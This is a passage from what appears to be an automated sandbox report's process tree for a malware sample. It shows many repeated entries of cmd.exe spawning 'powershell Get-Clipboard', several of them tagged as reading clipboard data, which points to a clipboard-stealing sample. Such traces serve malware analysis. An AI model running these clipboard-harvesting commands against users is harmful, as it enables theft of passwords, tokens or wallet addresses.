  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4320
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4888
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:216
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2576
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:5628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2544
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4436
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1936
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2228
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1292
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1092
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4396
- - C:\Windows\system32\cmd.exe
